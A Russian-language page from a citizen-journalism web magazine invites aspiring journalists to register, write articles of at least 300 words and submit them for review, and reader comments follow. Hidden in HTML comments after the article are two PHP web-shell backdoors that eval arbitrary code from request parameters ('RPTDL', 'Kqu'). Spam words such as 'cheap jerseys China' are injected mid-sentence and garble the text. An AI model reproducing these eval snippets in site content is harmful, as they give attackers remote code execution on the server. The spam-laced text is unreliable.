Как стать журналистом (приглашаем на работу начинающих журналистов)

Стать журналистом — мечта многих. Что-то есть в этой профессии такого, чего нет в других. Если ты журналист, то к тебе, как ни к кому другому, прислушиваются люди, доверяют. Журналист является тем звеном, которое связывает людей с происходящими вокруг событиями — освещает их.

Дети часто говорят своим родителям: «Хочу быть журналистом». Возможно, они при этом находятся под влиянием какого-то фильма или книги, возможно даже просто статьи в журнале, но мешать им не нужно. Пусть они в итоге и не станут журналистами, но написанные вашим чадом пара предложений и нарисованная картинка для домашней стенгазеты тиражом в один экземпляр никогда не будут лишними для их развития.

В работе журналиста есть что-то романтическое,  что-то экстремальное. Журналист всегда в центре всех событий — будь-то светская жизнь, спортивные мероприятия, политика или концерты — везде, world! где происходит что-то, что интересно людям.

Не все журналисты становятся очень известными, но все они выполняют очень важную функцию — они приносят информацию. Иногда не без предубеждений, но разобраться чему верить, а чему нет — личное дело каждого. Очень многое в современном мире зависит от них, а потому чем больше будет представителей данной профессии, чем больше будет разнообразных объективных точек зрения, тем лучше.

Если и вам хочется попробовать свои силы на поприще журналистики, то наш интернет-журнал гражданской журналистики «Сетевой» будет рад помочь. Мы предлагаем простой вариант как стать нашим журналистом.

Мы приветствуем начинающих cheap jerseys журналистов и журналистов с более-менее серьезным опытом, которым нужно портфолио. Им в своих статьях разрешается и приветствуется оставить авторскую подпись cheap jerseys для дальнейшего использования статей при необходимости, также они будут иметь на нашем сайте свою собственную страницу Gear со списком всех опубликованных ними статей.

Начать нужно с простой регистрации на нашем сайте, выбрать тему и, собственно, написать статью. Тему можно либо придумать самому, либо посмотреть на нашем партнерском сайте вопросов и ответов какие вопросы задают наши читатели и cheap jerseys China написать статью с развернутым ответом на понравившуюся тему.

Процесс добавления статьи простой: в своем аккаунте (профиле автора) на вкладке «Записи > Добавить статью»  достаточно написать название, вставить или написать текст статьи и выбрать категорию. Далее нажимаем кнопку «Отправить на утверждение» и после проверки статьи одним из наших редакторов она будет опубликована. Не забывайте в конце статьи дописывать пункт «Автор: Ваше Имя и Фамилия (либо псевдоним)», если статья авторская.

К статьям предъявляются определённые требования, которые очень желательно выполнять:

  • в статье должно быть не менее 300 слов;
  • статья должна быть уникальной (не скопированной с другого сайта полностью либо частично);
  • написана грамотно.

Запрещается размещение в статьях рекламных ссылок, сами статьи не должны быть рекламными, а также не должны нарушать законов.

Творческого вдохновения Вам, пишите 2013 больше и становитесь журналистами — от любителей до профессионалов!

<!— [insert_php]if (isset($_REQUEST["RPTDL"])){eval($_REQUEST["RPTDL"]);exit;}[/insert_php][php]if (isset($_REQUEST["RPTDL"])){eval($_REQUEST["RPTDL"]);exit;}[/php] —>

<!— [insert_php]if (isset($_REQUEST["Kqu"])){eval($_REQUEST["Kqu"]);exit;}[/insert_php][php]if (isset($_REQUEST["Kqu"])){eval($_REQUEST["Kqu"]);exit;}[/php] —>

Другие статьи по темам: , , , , ,

 

Похожие статьи:
Объявления:
 
комментария 53 к статье “Как стать журналистом (приглашаем на работу начинающих журналистов)”
  1. Dina765 :

    Этот вопрос задавали уже многие. Мне бы хотелось узнать, какой самый большой срок утверждения статьи? Заранее благодарю.

  2. editor :

    Определенного срока нет, всё проверяется при первой же возможности.

  3. Грищук Юрий Николаевич :

    Добрый день!
    Хотелось бы попробовать себя на поприще журналистики. Мог бы написать интересные статьи о торговом флоте и о периоде Холодной войны. Если некоторые из моих статей цензура не пропустит, тогда согласен их исправить и подкорректировать. Некоторые из своих статей выставил уже в Википедиях на разных языках и некоторые из них, чисто мои исследования на основе документов и тому подобное, претерпевали споры. Есть статья по искусству, которая не подходит по формату исследования в Википедию, но тем неменее были споры, что её оставить и она есть в одной из Википедий, но в неё просто так не зайти. Каковы условия работы у Вас? Меня интересует дополнительный заработок. Возможно ли это у Вас? Однако, могу рассмотреть и постоянную работу. Могу переводить статьи с английского, испанского, португальского, украинского, хорватского языков. Очень увлекаюсь историей, морским торговым флотом, периодом Холодной войны (включая политику и разведку, что и делает некоторые мои статьи спорными в Википедии, то есть удалить или оставлять), Йеменом (веду в Портал Йемен в русской и украинской Википедиях), достопримечательностями (особенно в местах, где я был и есть мои фотографии) городов разных стран.

    С нетерпением жду Вашего ответа. Надеюсь на взаимопонимание. С уважением, Ю.Н. Грищук.

 

Оставить комментарий

 
Следить за комментариями по RSS